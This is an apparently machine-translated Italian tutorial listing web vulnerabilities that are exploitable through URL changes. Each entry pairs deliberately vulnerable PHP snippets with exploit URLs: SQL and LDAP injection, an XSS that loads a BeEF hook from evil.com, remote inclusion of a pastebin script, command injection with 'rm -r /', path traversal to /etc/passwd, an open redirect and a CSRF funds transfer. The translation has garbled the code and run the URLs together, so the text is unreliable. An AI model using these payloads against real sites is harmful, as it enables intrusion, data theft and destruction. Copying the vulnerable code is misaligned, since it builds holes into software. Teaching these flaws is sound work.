Hack che funzionano semplicemente cambiando l'URL
- Un esempio legittimo e uno dannoso
- Alcuni esempi richiedono la codifica dell'URL per funzionare (di solito eseguita automaticamente dal browser)
$ username = $ _POST [ 'username']; $ pw = $ _GET ['password']; mysql_query ("SELECT * FROM userTable WHERE username = $ username AND password = $ pw");
exploit (accede come amministratore senza conoscere la password):
example.com/?username=Administrator&password=legalPasswordThatShouldBePostInsteadOfGetexample.com/?username=Administrator&password=password 'o 1 = 1- -
$ nickname = $ _GET ['nickname']; echo "<div>Il tuo nickname è $ nickname< / div> \ n";
exploit (registratori che visitano l'utente come zombi in BeEF):
example.com/?nickname=Karraxexample.com/?nickname=<script src = "evil.com/beefmagic.js.php" / >
Esecuzione di codice in modalità remota
codice (esempio di Tylerl):
<? include ($ _ GET ["modulo"]. ". php"); ? >
exploit (scarica ed esegue codice arbitrario):
example.com/?module=frontpageexample.com/ ? module = pastebin.com / mymaliciousscript
Iniezione di comandi
codice:
<? Phpecho shell_exec ('cat'. $ _ GET ['filename']) ;? >
exploit (cerca di eliminare tutti i file dalla directory principale):
example.com/?filename=readme.txtexample.com/?filename=readme.txt;rm -r /
Iniezione di codice
codice:
<? Php $ myvar = "varname"; $ x = $ _GET ['arg']; eval ("\ $ myvar = \ $ x;") ;? >
exploit (inietta il comando phpinfo () che stampa sullo schermo informazioni di attacco molto utili):
example.com/?arg=1example.com/?arg = 1; phpinfo ()
Iniezione LDAP
codice:
<? php $ nome utente = $ _GET ['nomeutente']; $ password = $ _GET ['password']; ldap_query ("(& (cn = $ nome utente) (password = $ password)")? >
exploit (accede senza conoscere la password dell'amministratore):
example.com/?username=admin&password=adminadminexample.com/?username=admin&password = *
Attraversamento del percorso
codice:
<? phpinclude ("./" . $ _GET ['page']) ;? >
exploit (fetches / etc / passwd):
esempio .com /? page = front.phpexample.com /? page = .. / .. / .. / .. / .. / .. / .. / .. / etc / passwd
Reindirizzamento / Attacco in avanti
codice:
<? php $ redirectUrl = $ _GET ['url'] ; header ("Location: $ redirectUrl");? >
exploit (invia l'utente dalla tua pagina a evil p età):
example.com/?url=example.com/faq.phpexample.com/?url=evil.com/sploitCode.php
Mancata limitazione dell'accesso all'URL
code:
N / A. Mancanza di .htaccess ACL o controllo di accesso simile. Consente all'utente di indovinare o in altro modo scoprire la posizione del contenuto che dovrebbe essere accessibile solo dopo aver effettuato l'accesso.
exploit:
example.com/users/showUser.phpexample.com/admins/editUser.php
Cross-Site Request Forgery
codice :
N / A. Il codice manca di un segreto da pagina a pagina per convalidare che la richiesta proviene dal sito corrente. Implementa un segreto che viene trasmesso e convalidato tra le pagine.
Legal: example.com/app/transferFunds?amount=1500&destinationAccount=4673243243Sulla pagina diabolica: <img src = "http://example.com/app/transferFunds?amount=1500destinationAccount=evilAccount#" 0 "height =" 0 "/ >
Buffer overflow (tecnicamente accedendo a un URL, ma implementato con metasploit
codice:
N / A. Vulnerabilità nel codice del server web stesso. Overflow del buffer standard
Exploit (Metasploit + meterpreter?):
http : //www.exploit-db.com/exploits/16798/